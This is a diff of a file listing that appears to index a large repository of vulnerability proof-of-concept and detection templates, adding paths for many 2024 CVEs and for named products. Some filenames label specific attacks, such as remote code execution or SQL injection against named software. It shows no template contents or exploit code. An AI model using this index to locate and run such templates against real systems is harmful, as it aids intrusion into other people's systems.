./poc/cve/CVE-2024-50513-9a78c086e5a8808800a944063382e7fe.yaml +./poc/cve/CVE-2024-50513.yaml ./poc/cve/CVE-2024-50514-accc68ef1929a7b2329c8ddb3987dcea.yaml +./poc/cve/CVE-2024-50514.yaml ./poc/cve/CVE-2024-50515-926c437f547ae6645dfe09ee30b6a14a.yaml +./poc/cve/CVE-2024-50515.yaml ./poc/cve/CVE-2024-50516-8a347587322ab61994f1c313f3ae4f6a.yaml +./poc/cve/CVE-2024-50516.yaml ./poc/cve/CVE-2024-50517-485094556c9e611d17c5184a72b60203.yaml ./poc/cve/CVE-2024-50517.yaml ./poc/cve/CVE-2024-50518-d6672a98af1090cdb4f43557f75cece2.yaml @@ -47339,6 +47479,7 @@ ./poc/cve/CVE-2024-50549-2d4e523848613f5dd79ab42485e6bb62.yaml ./poc/cve/CVE-2024-50549.yaml ./poc/cve/CVE-2024-50550-9294cd7dd32b1b6c4c7413876be90f29.yaml +./poc/cve/CVE-2024-50550.yaml ./poc/cve/CVE-2024-50551-70fff09e783977976394d8b5aa716e2c.yaml ./poc/cve/CVE-2024-50551.yaml ./poc/cve/CVE-2024-50552-110a4d935bb69b2e995e609bc6a2545d.yaml @@ -47508,6 +47649,7 @@ ./poc/cve/CVE-2024-51614-b3ae60217b15a5836c272790b0aa96be.yaml ./poc/cve/CVE-2024-51614.yaml ./poc/cve/CVE-2024-51615-472c74f38292481e3ef2df3b338ae9c4.yaml +./poc/cve/CVE-2024-51615.yaml ./poc/cve/CVE-2024-51616-ff2a503ee0970c948661ddcf7c43e4c1.yaml ./poc/cve/CVE-2024-51616.yaml ./poc/cve/CVE-2024-51617-7de904c99681c9b7e904df9fb94224bf.yaml @@ -47570,6 +47712,7 @@ ./poc/cve/CVE-2024-51645-2b531680ca59edbf0426f38d3d15a463.yaml ./poc/cve/CVE-2024-51645.yaml ./poc/cve/CVE-2024-51647-ad264e127abeca56e70808ef8908f3d5.yaml +./poc/cve/CVE-2024-51647.yaml ./poc/cve/CVE-2024-51648-0852ef395ba5917cb7109cf04ec0da08.yaml ./poc/cve/CVE-2024-51648.yaml ./poc/cve/CVE-2024-51649-bd32a6ffb76c36b23cc7636ba90e15e6.yaml @@ -47765,6 +47908,7 @@ ./poc/cve/CVE-2024-51791-52563af3c1447f632e60abe9f8872a81.yaml ./poc/cve/CVE-2024-51791.yaml ./poc/cve/CVE-2024-51792-bdfb574c36a41e7d922169660919a6d7.yaml +./poc/cve/CVE-2024-51792.yaml ./poc/cve/CVE-2024-51793-4d175c673b163520eb02bd9ac6b70380.yaml ./poc/cve/CVE-2024-51793-fb5dcea43e6538519aa5caa638ac7aa9.yaml ./poc/cve/CVE-2024-51793.yaml @@ -47811,6 +47955,7 @@ ./poc/cve/CVE-2024-51814-c9d1de6f4895b6765e1577177716171e.yaml ./poc/cve/CVE-2024-51814.yaml ./poc/cve/CVE-2024-51815-2050eb9a873e413f9671599898c2d828.yaml +./poc/cve/CVE-2024-51815.yaml ./poc/cve/CVE-2024-51816-bdee10c167d3a9876a83e9819552c55d.yaml ./poc/cve/CVE-2024-51816.yaml ./poc/cve/CVE-2024-51817-800a57a7c15f38c5b4d57fdbd0cc8d07.yaml @@ -48467,6 +48612,7 @@ ./poc/cve/CVE-2024-5327-c9ec3faf7380d55c4bb32eeaa8c62803.yaml ./poc/cve/CVE-2024-5327.yaml ./poc/cve/CVE-2024-53278-e787634bec31d7c19793015e1c4a9a1d.yaml +./poc/cve/CVE-2024-53278.yaml ./poc/cve/CVE-2024-5329-ca8b7f545093310580c6f20618c4c81f.yaml ./poc/cve/CVE-2024-5329.yaml ./poc/cve/CVE-2024-5330-b9508e5eab17157e42a41b20db729637.yaml @@ -48533,6 +48679,7 @@ ./poc/cve/CVE-2024-53724-7483242caf2fe1c9f9bd41336ff2129e.yaml ./poc/cve/CVE-2024-53724.yaml ./poc/cve/CVE-2024-53725-b1549800e4f49f80a8abddc499383424.yaml +./poc/cve/CVE-2024-53725.yaml ./poc/cve/CVE-2024-53726-1e919e9d2a69b020a76e46d4db30570d.yaml ./poc/cve/CVE-2024-53726.yaml ./poc/cve/CVE-2024-53727-1a09bfee59bca7ef7cc5c6492d37fc10.yaml @@ -48540,6 +48687,7 @@ ./poc/cve/CVE-2024-53728-6b8b9000b4c661aae9619e96433dfe52.yaml ./poc/cve/CVE-2024-53728.yaml ./poc/cve/CVE-2024-53729-792d23502d5d4d568b4da98319a2bf83.yaml +./poc/cve/CVE-2024-53729.yaml ./poc/cve/CVE-2024-53730-ac59c1fffc1a30acb03cbc337b1c214f.yaml ./poc/cve/CVE-2024-53730.yaml ./poc/cve/CVE-2024-53731-635558162ad1807994ca63c7d8601caa.yaml @@ -48555,8 +48703,11 @@ ./poc/cve/CVE-2024-53736-9a7ae43cdef5a228c03407f042bfbc83.yaml ./poc/cve/CVE-2024-53736.yaml ./poc/cve/CVE-2024-53737-d75fb3be3b1507d8a5102b9146c5ac69.yaml +./poc/cve/CVE-2024-53737.yaml ./poc/cve/CVE-2024-53738-f9b4da473884d91136fd1add1208b51e.yaml +./poc/cve/CVE-2024-53738.yaml ./poc/cve/CVE-2024-53739-245349b994f894d211d92e07e7132e02.yaml +./poc/cve/CVE-2024-53739.yaml ./poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml ./poc/cve/CVE-2024-53740.yaml ./poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml @@ -48684,12 +48835,17 @@ ./poc/cve/CVE-2024-53802-b9538c1dec1563ac5f19162fdf0a385a.yaml ./poc/cve/CVE-2024-53802.yaml ./poc/cve/CVE-2024-53803-7c065e8dc8daf36d5150824cdcc9233f.yaml +./poc/cve/CVE-2024-53803.yaml ./poc/cve/CVE-2024-53804-7f7eb1b52516912e3dcbd3b07c0abf16.yaml +./poc/cve/CVE-2024-53804.yaml ./poc/cve/CVE-2024-53805-36ba7e73c93e1a24c1943bbb34e10a80.yaml +./poc/cve/CVE-2024-53805.yaml ./poc/cve/CVE-2024-53806-f5764f3e7c8f3e4b994ffc48ac3274b3.yaml ./poc/cve/CVE-2024-53806.yaml ./poc/cve/CVE-2024-53807-b4800b9f2218096c453e2fb7ff8deaba.yaml +./poc/cve/CVE-2024-53807.yaml ./poc/cve/CVE-2024-53808-734202edafa17e1da99062a92085d7fe.yaml +./poc/cve/CVE-2024-53808.yaml ./poc/cve/CVE-2024-53809-7c3d56c1ef81fd38247e7aceb4ce9335.yaml ./poc/cve/CVE-2024-53809.yaml ./poc/cve/CVE-2024-53810-05164515cb442904515213b867dfadbe.yaml @@ -48697,16 +48853,21 @@ ./poc/cve/CVE-2024-53811-693bd83477fd87295db6144403ba95fc.yaml ./poc/cve/CVE-2024-53811.yaml ./poc/cve/CVE-2024-53812-f7722f28837f9ffee33d0d19cbdc6579.yaml +./poc/cve/CVE-2024-53812.yaml ./poc/cve/CVE-2024-53813-c4bb899ff6e3559fc995d6f8107e8fa5.yaml ./poc/cve/CVE-2024-53813.yaml ./poc/cve/CVE-2024-53814-45badbf9bef37dbf159a0f6bdbb33fac.yaml ./poc/cve/CVE-2024-53814.yaml ./poc/cve/CVE-2024-53815-2e40699b6c5f7ad5936edd6b07104f72.yaml +./poc/cve/CVE-2024-53815.yaml ./poc/cve/CVE-2024-53816-5bf76a83c973cc1ae3f76d3a4e284aef.yaml ./poc/cve/CVE-2024-53816.yaml ./poc/cve/CVE-2024-53817-c6b5a8cf44ad040cab396afbb639a133.yaml +./poc/cve/CVE-2024-53817.yaml ./poc/cve/CVE-2024-53818-7859a96404bfca0d2fce23fb1104c8ba.yaml +./poc/cve/CVE-2024-53818.yaml ./poc/cve/CVE-2024-53819-ed57d3a9059f066ad18459455b0d7bd1.yaml +./poc/cve/CVE-2024-53819.yaml ./poc/cve/CVE-2024-5382-3f1ae151e74bf3a85689b92b47a722f8.yaml ./poc/cve/CVE-2024-5382.yaml ./poc/cve/CVE-2024-53820-d29687c5b1248e1eb95b29312a0b01b3.yaml @@ -48716,10 +48877,13 @@ ./poc/cve/CVE-2024-53822-e7eb2dbf72bf2a9d2a5f203cb29bb977.yaml ./poc/cve/CVE-2024-53822.yaml ./poc/cve/CVE-2024-53823-ec6e0f4eab04b9728e4dde6ee13b9ace.yaml +./poc/cve/CVE-2024-53823.yaml ./poc/cve/CVE-2024-53824-6175e1733e3397fffa8fe7b047e94e55.yaml +./poc/cve/CVE-2024-53824.yaml ./poc/cve/CVE-2024-53825-e050ec243fb6a9bd4ea08e3ffba5ac38.yaml ./poc/cve/CVE-2024-53825.yaml ./poc/cve/CVE-2024-53826-e1607a5c14986b3d990b221c0149561b.yaml +./poc/cve/CVE-2024-53826.yaml ./poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml ./poc/cve/CVE-2024-5416.yaml ./poc/cve/CVE-2024-5418-434a339fc4d8515bf3d8877608840f7e.yaml @@ -48729,7 +48893,9 @@ ./poc/cve/CVE-2024-54205-8c6843e98b7d35de1333ebd6a9cc4108.yaml ./poc/cve/CVE-2024-54205.yaml ./poc/cve/CVE-2024-54206-d592b86b797429244811af87aadde053.yaml +./poc/cve/CVE-2024-54206.yaml ./poc/cve/CVE-2024-54207-6550e248932e2b5e412bf4389b4db0b2.yaml +./poc/cve/CVE-2024-54207.yaml ./poc/cve/CVE-2024-54208-69923a63f86a99149e7d69a9950e6d76.yaml ./poc/cve/CVE-2024-54208.yaml ./poc/cve/CVE-2024-54209-a394776dfd7d69b7f47439e6bf38192b.yaml @@ -48739,36 +48905,61 @@ ./poc/cve/CVE-2024-54211-eed93c53b719da64f5f167a3624cd5f6.yaml ./poc/cve/CVE-2024-54211.yaml ./poc/cve/CVE-2024-54212-d09821a4422849355cacdfed1659a677.yaml +./poc/cve/CVE-2024-54212.yaml ./poc/cve/CVE-2024-54213-c849bc6412851fdfab9fa6a72e7286ff.yaml +./poc/cve/CVE-2024-54213.yaml ./poc/cve/CVE-2024-54214-62204c0e75824c81aacf42c7b2c3ef67.yaml +./poc/cve/CVE-2024-54214.yaml ./poc/cve/CVE-2024-54215-eb6c568774fac21c9e0fd876c8c18c48.yaml +./poc/cve/CVE-2024-54215.yaml ./poc/cve/CVE-2024-54216-5024750a9504fe312f75e6f67ba9c71d.yaml +./poc/cve/CVE-2024-54216.yaml ./poc/cve/CVE-2024-54217-313ad197c9d2d51af932f72d31a189fa.yaml +./poc/cve/CVE-2024-54217.yaml ./poc/cve/CVE-2024-54218-06b4afe7f8ad8e989e59bbb3cdd989da.yaml +./poc/cve/CVE-2024-54218.yaml ./poc/cve/CVE-2024-54219-0c95674ba25b17f5866c5401fb53b69f.yaml +./poc/cve/CVE-2024-54219.yaml ./poc/cve/CVE-2024-54220-dabc3c346f24f802d453a828795d331c.yaml +./poc/cve/CVE-2024-54220.yaml ./poc/cve/CVE-2024-54221-6ec2fd6753d862f4960591e64ef3b6c9.yaml +./poc/cve/CVE-2024-54221.yaml ./poc/cve/CVE-2024-54223-eb5a3cfa0572e6123bd603f96e9d1ae5.yaml +./poc/cve/CVE-2024-54223.yaml ./poc/cve/CVE-2024-54224-633e8c33e4210ddd571311b75b795b03.yaml +./poc/cve/CVE-2024-54224.yaml ./poc/cve/CVE-2024-54225-865cf12d67ad4e2a12b4e760865df92d.yaml +./poc/cve/CVE-2024-54225.yaml ./poc/cve/CVE-2024-54226-c4753fa19fce4c8a27345324e7b382cb.yaml +./poc/cve/CVE-2024-54226.yaml ./poc/cve/CVE-2024-54227-43c41feaa9d58f8efc0b1ce3261306a2.yaml +./poc/cve/CVE-2024-54227.yaml ./poc/cve/CVE-2024-54228-d3544c5336366a751ac82c436ef933e3.yaml +./poc/cve/CVE-2024-54228.yaml ./poc/cve/CVE-2024-54230-421f5bcea4b13be62429fcb8ab498858.yaml +./poc/cve/CVE-2024-54230.yaml ./poc/cve/CVE-2024-54231-427de4f60398b7e1078355b6618fa118.yaml +./poc/cve/CVE-2024-54231.yaml ./poc/cve/CVE-2024-54232-43abed5835eaafea250948b708d95e51.yaml +./poc/cve/CVE-2024-54232.yaml ./poc/cve/CVE-2024-5424-df160c9df5b615381a764753829b3ffb.yaml ./poc/cve/CVE-2024-5424.yaml ./poc/cve/CVE-2024-54247-32dd452fd1db8cb528bb367644d98408.yaml +./poc/cve/CVE-2024-54247.yaml ./poc/cve/CVE-2024-5425-8573326a950aad533931811dfbdfb643.yaml ./poc/cve/CVE-2024-5425.yaml ./poc/cve/CVE-2024-54250-80229f33352eda0e4db54b51c9f141a7.yaml +./poc/cve/CVE-2024-54250.yaml ./poc/cve/CVE-2024-54251-4675c5cbd2d4490266ac6406a9506a12.yaml +./poc/cve/CVE-2024-54251.yaml ./poc/cve/CVE-2024-54253-b4f4e0a053f49fd713057ccba10c41ab.yaml +./poc/cve/CVE-2024-54253.yaml ./poc/cve/CVE-2024-54255-22f20fe5fd8f58ffc816fe1d69d3dfea.yaml +./poc/cve/CVE-2024-54255.yaml ./poc/cve/CVE-2024-5426-05a62725e997584a7ca96583d0ed07b0.yaml ./poc/cve/CVE-2024-5426.yaml ./poc/cve/CVE-2024-54260-174ca9070168a4655d9261554d70d98e.yaml +./poc/cve/CVE-2024-54260.yaml ./poc/cve/CVE-2024-5427-8e98140a73fa39518f80acb935a5af8c.yaml ./poc/cve/CVE-2024-5427.yaml ./poc/cve/CVE-2024-5429-4e4d745e7910fb2ab893ff12ad5452c1.yaml @@ -50193,6 +50384,7 @@ ./poc/cve/CVE-2024-7963-42883078e2295a44c19c2974ad634068.yaml ./poc/cve/CVE-2024-7963.yaml ./poc/cve/CVE-2024-7982-fc7896dc545f4f6e317ed308a0e8b1e6.yaml +./poc/cve/CVE-2024-7982.yaml ./poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml ./poc/cve/CVE-2024-7985.yaml ./poc/cve/CVE-2024-8016-d1bc0d8335eb95e44886878c9717595b.yaml @@ -50263,6 +50455,7 @@ ./poc/cve/CVE-2024-8126-cacfaff114cb1cf655ed1db79dcd7b99.yaml ./poc/cve/CVE-2024-8126.yaml ./poc/cve/CVE-2024-8157-6e2ff7bf6e39d3c1283ab25439378a24.yaml +./poc/cve/CVE-2024-8157.yaml ./poc/cve/CVE-2024-8181.yaml ./poc/cve/CVE-2024-8187-37b7d5f89d1ca080b4cd6f300d397c8c.yaml ./poc/cve/CVE-2024-8187.yaml @@ -50357,6 +50550,7 @@ ./poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml ./poc/cve/CVE-2024-8369.yaml ./poc/cve/CVE-2024-8378-74a7d87cee245c48a3bf9a30ec708ca3.yaml +./poc/cve/CVE-2024-8378.yaml ./poc/cve/CVE-2024-8379-4628330a23e614f19a4cee7de7658bb5.yaml ./poc/cve/CVE-2024-8379-fe39d989e4d132f5087243fbc500f6e9.yaml ./poc/cve/CVE-2024-8379.yaml @@ -50391,6 +50585,7 @@ ./poc/cve/CVE-2024-8442-b5cb9608845f018001708aacb476f0cc.yaml ./poc/cve/CVE-2024-8442.yaml ./poc/cve/CVE-2024-8444-6574252782a3a4b5b570683a6ba1f844.yaml +./poc/cve/CVE-2024-8444.yaml ./poc/cve/CVE-2024-8461.yaml ./poc/cve/CVE-2024-8476-2e99a2b661bac0abf052a20c5de25aea.yaml ./poc/cve/CVE-2024-8476.yaml @@ -50495,6 +50690,7 @@ ./poc/cve/CVE-2024-8624-eda2995e49f0eef58ec03aafc81620f7.yaml ./poc/cve/CVE-2024-8624.yaml ./poc/cve/CVE-2024-8625-d78c80da7bee3e0e6c7436c5df622773.yaml +./poc/cve/CVE-2024-8625.yaml ./poc/cve/CVE-2024-8627-5e1dd56a72613db49e7c28fef055a1ae.yaml ./poc/cve/CVE-2024-8627.yaml ./poc/cve/CVE-2024-8628-5dc2473be25badf6894e296c03e2e56a.yaml @@ -50828,6 +51024,7 @@ ./poc/cve/CVE-2024-9109-db046fec044ec68a48276b8ee3af3015.yaml ./poc/cve/CVE-2024-9109.yaml ./poc/cve/CVE-2024-9111-0ab199d09ef9476690f1e53604ee2f5c.yaml +./poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml ./poc/cve/CVE-2024-9111.yaml ./poc/cve/CVE-2024-9115-07ac47d03400519778a0be24bcd69ac7.yaml ./poc/cve/CVE-2024-9115.yaml @@ -50967,6 +51164,7 @@ ./poc/cve/CVE-2024-9289-ce62b0a9bacb1caa832b04983319ac6e.yaml ./poc/cve/CVE-2024-9289.yaml ./poc/cve/CVE-2024-9290-5dcc80904918d747de269b21d040c79c.yaml +./poc/cve/CVE-2024-9290.yaml ./poc/cve/CVE-2024-9292-19dc703f2b0bc0aa1458f81c299d2b0a.yaml ./poc/cve/CVE-2024-9292.yaml ./poc/cve/CVE-2024-9302-a4e5e1a6797eb0268e9f6e37033f4ea7.yaml @@ -51050,11 +51248,13 @@ ./poc/cve/CVE-2024-9421.yaml ./poc/cve/CVE-2024-9422-36832b91d82ec54ad53a0608240202ac.yaml ./poc/cve/CVE-2024-9422-d55541dec5fdad3a0414a578e636b2f1.yaml +./poc/cve/CVE-2024-9422.yaml ./poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml ./poc/cve/CVE-2024-9425.yaml ./poc/cve/CVE-2024-9426-234491a2cee69902e52d1e13b146e157.yaml ./poc/cve/CVE-2024-9426.yaml ./poc/cve/CVE-2024-9428-c09d51632b50b1241638d75cbef69a48.yaml +./poc/cve/CVE-2024-9428.yaml ./poc/cve/CVE-2024-9430-129ad6d61f04e28e61c3cacf74b91e82.yaml ./poc/cve/CVE-2024-9430.yaml ./poc/cve/CVE-2024-9434-a5e01a5e10b9eb2ced5b5a4c37943620.yaml @@ -51189,6 +51389,7 @@ ./poc/cve/CVE-2024-9607-815ef285570b4259ae993f3feefc49d6.yaml ./poc/cve/CVE-2024-9607.yaml ./poc/cve/CVE-2024-9608-43ae0e925e1e1d7237870fbf4dcc9527.yaml +./poc/cve/CVE-2024-9608.yaml ./poc/cve/CVE-2024-9609-2981fd6dfce2190c72de28c2bd4dea23.yaml ./poc/cve/CVE-2024-9609.yaml ./poc/cve/CVE-2024-9610-22573cea45a3c22fba477c8e4bf581f3.yaml @@ -51233,6 +51434,7 @@ ./poc/cve/CVE-2024-9650-b366e98270b7c64939bad3b88fc2f326.yaml ./poc/cve/CVE-2024-9650.yaml ./poc/cve/CVE-2024-9651-22705fcb7e0d7ad90586a2952ccaeadc.yaml +./poc/cve/CVE-2024-9651.yaml ./poc/cve/CVE-2024-9652-44db9961d333aa8937876e8e157f625b.yaml ./poc/cve/CVE-2024-9652.yaml ./poc/cve/CVE-2024-9653-8cc4841842ce3b54e5c10d7d3492eb7e.yaml @@ -51271,6 +51473,7 @@ ./poc/cve/CVE-2024-9694.yaml ./poc/cve/CVE-2024-9696-7eb3ceca660ff8ed51fe8b0a6a2f165c.yaml ./poc/cve/CVE-2024-9696.yaml +./poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml ./poc/cve/CVE-2024-9700-ba9609a222eaa8c29e551df91b2a325f.yaml ./poc/cve/CVE-2024-9700.yaml ./poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml @@ -51288,6 +51491,7 @@ ./poc/cve/CVE-2024-9756-64a408f630e792f3ff717cc9822672de.yaml ./poc/cve/CVE-2024-9756.yaml ./poc/cve/CVE-2024-9768-30f7e3c972d3515da9f5d833ce52d040.yaml +./poc/cve/CVE-2024-9768.yaml ./poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml ./poc/cve/CVE-2024-9769.yaml ./poc/cve/CVE-2024-9772-5094698925e989ea36420156bd740e26.yaml @@ -51312,12 +51516,15 @@ ./poc/cve/CVE-2024-9824-44742b5dfe15bf136d8b10c8fdb6d6e7.yaml ./poc/cve/CVE-2024-9824.yaml ./poc/cve/CVE-2024-9828-b109b777c27d6b8c5c2052777f0757de.yaml +./poc/cve/CVE-2024-9828.yaml ./poc/cve/CVE-2024-9829-3798cb15694af364b3770e56eba30498.yaml ./poc/cve/CVE-2024-9829.yaml ./poc/cve/CVE-2024-9830-ba53cc170b6dbd51f1cc76ccfd6109f9.yaml ./poc/cve/CVE-2024-9830.yaml ./poc/cve/CVE-2024-9835-38ca210b0204cafbf6f8c2b60a4a2cb6.yaml +./poc/cve/CVE-2024-9835.yaml ./poc/cve/CVE-2024-9836-30a0c883d6baf4f6567157334592361c.yaml +./poc/cve/CVE-2024-9836.yaml ./poc/cve/CVE-2024-9837-640ab38f88c83ed061eb38b767c65747.yaml ./poc/cve/CVE-2024-9837.yaml ./poc/cve/CVE-2024-9839-959311f6b2914d74ef3d633f67e6519f.yaml @@ -51408,6 +51615,7 @@ ./poc/cve/CVE-2024-9933-e1ec60c544c2e28af5a94072e33b5a84.yaml ./poc/cve/CVE-2024-9933.yaml ./poc/cve/CVE-2024-9934-5ae7ef68155780d5697b9e643131dccb.yaml +./poc/cve/CVE-2024-9934.yaml ./poc/cve/CVE-2024-9935-44469e492e60f8411ffdcda9081fb983.yaml ./poc/cve/CVE-2024-9935-e34f6995a95f33b10c197658639863ad.yaml ./poc/cve/CVE-2024-9935.yaml @@ -58925,6 +59133,7 @@ ./poc/cve/inspur-tscev4-cve-2020-21224-rce.yml ./poc/cve/jboss-cve-2010-1871.yaml ./poc/cve/jboss-cve-2010-1871.yml +./poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml ./poc/cve/jellyfin-cve-2021-29490.yaml ./poc/cve/jellyfin-cve-2021-29490.yml ./poc/cve/jellyfin-file-read-cve-2021-21402.yaml @@ -60426,6 +60635,7 @@ ./poc/detect/adbhoney-honeypot-cnxn-detect.yaml ./poc/detect/adbhoney-honeypot-shell-detect.yaml ./poc/detect/adbuddy-adblocker-detection-3bb46498f1afb79669fda4714744548d.yaml +./poc/detect/adbuddy-adblocker-detection.yaml ./poc/detect/adcs-detect.yaml ./poc/detect/addeventlistener-detect-64.yaml ./poc/detect/addeventlistener-detect-65.yaml @@ -69124,6 +69334,7 @@ ./poc/microsoft/impresscms-detect.yaml ./poc/microsoft/impresscms.yaml ./poc/microsoft/impresspages-cms.yaml +./poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml ./poc/microsoft/imsanity.yaml ./poc/microsoft/indonasia-toko-cms-sql.yaml ./poc/microsoft/informatics-cms.yaml @@ -70405,6 +70616,7 @@ ./poc/mysql/azure-mysql-db-update-unalerted.yaml ./poc/mysql/azure-nsg-mysql-unrestricted.yaml ./poc/mysql/create-mysql-detection.yaml +./poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml ./poc/mysql/dionaea-mysql-honeypot-detect.yaml ./poc/mysql/e-cology-e-office-mysql-config-leak.yaml ./poc/mysql/ecology-mysql-config.yaml @@ -83329,6 +83541,7 @@ ./poc/other/Alibaba-Anyproxy-fileRead.yaml ./poc/other/AllInOne-2-6-0-readfile.yaml ./poc/other/Anni-fileDownload.yaml +./poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml ./poc/other/AolynkBR304-weakPass.yaml ./poc/other/Apexis-IPCAM-info.yaml ./poc/other/Application_level_dos.yaml @@ -83770,6 +83983,7 @@ ./poc/other/abcapp-creator-0915ccd38e9234bbe108df1946638a13.yaml ./poc/other/abcapp-creator.yaml ./poc/other/abcbiz-addons-f574e93c5fcb8829799acb29890991b0.yaml +./poc/other/abcbiz-addons.yaml ./poc/other/abeta-punchout-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/abeta-punchout.yaml ./poc/other/abitgone-commentsafe-c3a6ddfd689a765dd5c0a9e893fd5e7e.yaml @@ -84020,7 +84234,9 @@ ./poc/other/acf-front-end-editor.yaml ./poc/other/acf-frontend-display.yaml ./poc/other/acf-frontend-form-element-02ae74747e9ca4533fa8476aac124374.yaml +./poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml ./poc/other/acf-frontend-form-element-3c9af9090d7895d467710343e1e58ccb.yaml +./poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml ./poc/other/acf-frontend-form-element.yaml ./poc/other/acf-image-crop-add-on-48209b6f934c02b05cd32cbf6656419d.yaml ./poc/other/acf-image-crop-add-on.yaml @@ -85009,6 +85225,7 @@ ./poc/other/aidreform.yaml ./poc/other/aim.yaml ./poc/other/aio-contact-9c5a8fce29d8cb65da0f5a5b7cac1f0c.yaml +./poc/other/aio-contact.yaml ./poc/other/aio-time-clock-lite-73fa64b7d4bf28a41fdeb87286cc659c.yaml ./poc/other/aio-time-clock-lite.yaml ./poc/other/aiomatic-automatic-ai-content-writer-b1ccb28c2fa59e7b18e1ffd1e815d9d8.yaml @@ -85286,6 +85503,7 @@ ./poc/other/all-in-one-seo-pack-pro.yaml ./poc/other/all-in-one-seo-pack.yaml ./poc/other/all-in-one-slider-14b7d4b703641121459b5014bbc6bd54.yaml +./poc/other/all-in-one-slider.yaml ./poc/other/all-in-one-video-gallery-6955fa259858f70bcb7e512f050bb08a.yaml ./poc/other/all-in-one-video-gallery-7740c66c87fb2221a145ee3f8964614a.yaml ./poc/other/all-in-one-video-gallery-7cba5cebb250af0c749cada174685613.yaml @@ -85379,6 +85597,7 @@ ./poc/other/alphabetic-pagination-plugin.yaml ./poc/other/alphabetic-pagination.yaml ./poc/other/alphabetical-list-fcb529436e163b55fffdd5d732bd07fe.yaml +./poc/other/alphabetical-list.yaml ./poc/other/alpine-photo-tile-for-pinterest-dd9ae7ae8f1a7115cd8bb588fe7ef45f.yaml ./poc/other/alpine-photo-tile-for-pinterest.yaml ./poc/other/alstom-system.yaml @@ -87331,6 +87550,7 @@ ./poc/other/billingtesttool.yaml ./poc/other/bimpos.yaml ./poc/other/bin-binlist.yaml +./poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml ./poc/other/bin-stripe-donation.yaml ./poc/other/bing-site-verification-using-meta-tag-af119b663502cc9c02296feffe9155e5.yaml ./poc/other/bing-site-verification-using-meta-tag.yaml @@ -87471,6 +87691,7 @@ ./poc/other/blixkrieg-f1f43ca41ccf14d8f46bbc8fda17c18c.yaml ./poc/other/blixkrieg.yaml ./poc/other/blizzard-quotes-bde5ee51c28fdec7059f71aa63b9d52f.yaml +./poc/other/blizzard-quotes.yaml ./poc/other/blobinator-320551d2488bf7eded48e3e77110131e.yaml ./poc/other/blobinator-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/blobinator-e3bbf6e55e07e8e4668d4befa641f94d.yaml @@ -87641,6 +87862,7 @@ ./poc/other/boastmachine.yaml ./poc/other/boat-rental-system-5973f7494030485e36522518a1a396d8.yaml ./poc/other/boat-rental-system.yaml +./poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml ./poc/other/bodybuildingcom.yaml ./poc/other/boilerplate-extension-ca6049340d4784eaae739d7b2c4a3496.yaml ./poc/other/boilerplate-extension-d0f6747c9732f64b78471a454da82868.yaml @@ -87799,6 +88021,7 @@ ./poc/other/booking-system-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/booking-system-plugin.yaml ./poc/other/booking-system-trafft-5c6449fdf82d85068f035ee2f7c81477.yaml +./poc/other/booking-system-trafft.yaml ./poc/other/booking-system.yaml ./poc/other/booking-ultra-pro-028ab0828eac3059bb66ef5a1ce44f09.yaml ./poc/other/booking-ultra-pro-15c156c7e76d4f5a78dada485b004868.yaml @@ -88416,6 +88639,8 @@ ./poc/other/builderchild-depot.yaml ./poc/other/builderchild-market.yaml ./poc/other/buildkite.yaml +./poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml +./poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml ./poc/other/bulk-add-to-cart-xforwc-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bulk-add-to-cart-xforwc-e7d05b0a2c85ee1ade7bf5ca69c912bf.yaml ./poc/other/bulk-add-to-cart-xforwc.yaml @@ -88490,6 +88715,7 @@ ./poc/other/bulk-resize-media-9e1541d38c8eaeed6eca5dee15217ad6.yaml ./poc/other/bulk-resize-media.yaml ./poc/other/bulk-role-change-2184325438ba670b61cd9b6f6df928fc.yaml +./poc/other/bulk-role-change.yaml ./poc/other/bulkpress-6cab963b9de4b9d0323f414bcf6ecfb7.yaml ./poc/other/bulkpress.yaml ./poc/other/bulletin-announcements-46b8a362033c2880d378a1a49beddfca.yaml @@ -89165,6 +89391,7 @@ ./poc/other/caxton.yaml ./poc/other/cb-logo-slider-6fc89698423781c51940a6f041af1e11.yaml ./poc/other/cb-logo-slider-c1c57bce6e7abc05a41314004b296fc2.yaml +./poc/other/cb-logo-slider.yaml ./poc/other/cbcurrencyconverter-ee2537008d80f69614315dff861d34fe.yaml ./poc/other/cbcurrencyconverter.yaml ./poc/other/cbi-referral-manager-61e01ca7d9166bfdf492f99d67a592e9.yaml @@ -90410,6 +90637,7 @@ ./poc/other/companion-auto-update-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/companion-auto-update-plugin.yaml ./poc/other/companion-auto-update.yaml +./poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml ./poc/other/companion-sitemap-generator-4a250ab8c94cb782214f7ebd60a04499.yaml ./poc/other/companion-sitemap-generator-77988317f5b0e9fe57b9da5469272d7b.yaml ./poc/other/companion-sitemap-generator-90a7930451947b64d95d162d4a52f512.yaml @@ -90493,6 +90721,7 @@ ./poc/other/coneblog-widgets-ec4fe1cabb457f15256813e0e7ad1522.yaml ./poc/other/coneblog-widgets.yaml ./poc/other/conking-schoolgroup.yaml 